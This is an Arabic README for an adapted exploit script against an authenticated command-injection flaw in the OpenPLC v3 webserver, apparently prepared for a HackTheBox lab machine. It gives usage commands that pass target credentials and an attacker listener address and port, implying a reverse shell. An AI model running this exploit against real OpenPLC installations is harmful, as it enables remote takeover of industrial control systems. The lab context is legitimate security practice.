
OpenPLC 3: تنفيذ تعليمات برمجية عن بُعد بعد المصادقة على خادم الويب.
OpenPLC 3 WebServer تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة.
يؤدي وجود ثغرة حقن الأوامر في Open PLC Webserver الإصدار v3 إلى تمكين المهاجمين عن بُعد من تشغيل تعليمات برمجية عشوائية. تم اختبارها فقط على آلة HTB Wifinetictwo.htb.
واجهت مشاكل مع جميع السكربتات التي تستغل الثغرة، ربما لأنني أستخدم Parrot أو متصفحي، متصفح Chromium يعمل لتسجيل الدخول، بينما واجهت مشاكل في تسجيل الدخول مع Firefox ويحدث شيء غريب لخادم الويب مع طلب POST لتسجيل الدخول. قمت بتعديل السكربت من thewhiteh4t؛ هناك أجزاء (بشكل أساسي طريقة الرفع) منسوخة فقط، لكنني غيّرت الجزء الذي يحصل على الكوكيز من الخادم لتشغيل الاستغلال.
تم توفير الإثبات الأصلي (PoC) بواسطة Fellipe Oliveira
آمل أن يساعدك إذا واجهت مشاكل معه.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
بدلاً من ذلك، يمكنك تعديل exploit.py
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass